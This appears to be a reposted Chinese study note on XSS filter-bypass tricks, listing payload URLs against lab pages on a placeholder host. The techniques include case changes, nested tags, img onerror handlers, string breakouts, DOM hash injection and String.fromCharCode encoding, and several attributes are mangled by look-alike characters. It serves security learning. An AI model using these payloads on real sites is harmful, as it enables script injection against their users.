【复习】XSS_03_绕过技巧
2021/5/22 18:57:24
本文主要是介绍【复习】XSS_03_绕过技巧,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
xss的绕过技巧
1、大小写绕过 http://target_sys.com/xss/xss04.php?name=<Script>alert(1);</Script> 2、属性多余 http://target_sys.com/xss/xss05.php?name=<script<script>>alert(1);</sc</script>ript> 3、转换标签 http://target_sys.com/xss/xss06.php?name=moon<img src=a one rror=alert(1)> 4、禁用alert http://target_sys.com/xss/xss07.php?name=<img src="1" one rror="confirm('xss')"> 5、js输出 http://target_sys.com/xss/xss08.php?name=moon";alert($a)// 6、js过滤输出 过滤单引号 http://target_sys.com/xss/xss09.php?name=moon';alert($a);// 7、dom输出 http://target_sys.com/xss/xss10.php?name=moon#<script>alert(1);</script> http://target_sys.com/xss/xss10.php?name=moon#<script>alert(/xss/);</script> hash 属性是一个可读可写的字符串,该字符串是 URL 的锚部分(从 # 号开始的部分)。 substring 从#开始截取后面的部分 8、urlxss http://target_sys.com/xss/xss11.php/" οnsubmit="alert('1') $_SERVER['PHP_SELF'] 9、过滤特殊字符 php开启gpc之后 单引号(’)、双引号(”)、反斜线()与 NUL(NULL 字符)等字符都会被加上反斜线 http://target_sys.com/xss/xss12.php?name=<script>alert(1);</script> http://target_sys.com/xss/xss12.php?name=<script>eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,13))</script> 10、过滤大小号 http://target_sys.com/xss/xss13.php?name=moon' οnmοuseοver='javascript:alert(1)
一、大小写绕过
二、属性多余(一次过滤)
三、转换标签
四、禁用alert
五、5、js输出
六、js过滤输出(过滤单引号)
七、dom输出
八、urlxss
九、过滤特殊字符
php开启gpc之后
单引号(’)、双引号(”)、反斜线()与 NUL(NULL 字符)等字符都会被加上反斜线
http://target_sys.com/xss/xss12.php?name=<script>alert(1);</script> http://target_sys.com/xss/xss12.php?name=<script>eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,13))</script>
10、过滤大小号
移出鼠标就执行
http://target_sys.com/xss/xss13.php?name=moon' οnmοuseοver='javascript:alert(1)
这篇关于【复习】XSS_03_绕过技巧的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-06-26结对编程到底难不难?答案在这里
- 2024-06-19《2023版Java工程师》课程升级公告
- 2024-06-15matplotlib作图不显示3D图,怎么办?
- 2024-06-1503-Loki 日志监控
- 2024-06-1504-让LLM理解知识 -Prompt
- 2024-06-05做软件测试需要懂代码吗?
- 2024-06-0514-ShardingSphere的分布式主键实现
- 2024-06-03为什么以及如何要进行架构设计权衡?
- 2024-05-31全网首发第二弹!软考2024年5月《软件设计师》真题+解析+答案!(11-20题)
- 2024-05-31全网首发!软考2024年5月《软件设计师》真题+解析+答案!(21-30题)